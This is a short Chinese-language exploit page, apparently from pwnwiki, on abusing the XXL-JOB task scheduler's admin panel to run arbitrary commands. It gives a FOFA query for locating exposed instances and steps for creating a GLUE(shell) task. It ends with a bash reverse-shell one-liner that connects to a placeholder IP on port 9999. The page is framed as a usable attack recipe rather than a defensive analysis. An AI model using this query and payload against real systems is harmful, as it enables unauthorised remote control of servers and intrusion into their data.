# XXL-JOB 任務調度中心 後台任意命令執行漏洞
==FOFA==
app="XXL-JOB" || title="任务调度中心"
==漏洞利用==
登錄後台增加一個任務:
![](/static/pwnwiki/img/Xxl-4.png )
注意運行模式需要為 GLUE(shell)
![](/static/pwnwiki/img/Xxl-5.png )
點擊 GLUE IDE編輯腳本
![](/static/pwnwiki/img/Xxl-6.png )
![](/static/pwnwiki/img/Xxl-7.png )
執行探測出網,和任務調用是否可執行
反彈一個shell
#!/bin/bash bash -c 'exec bash -i &>/dev/tcp/xxx.xxx.xxx.xxx/9999 <&1'
==參考==
https://short.pwnwiki.org/?c=PaRcxf
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容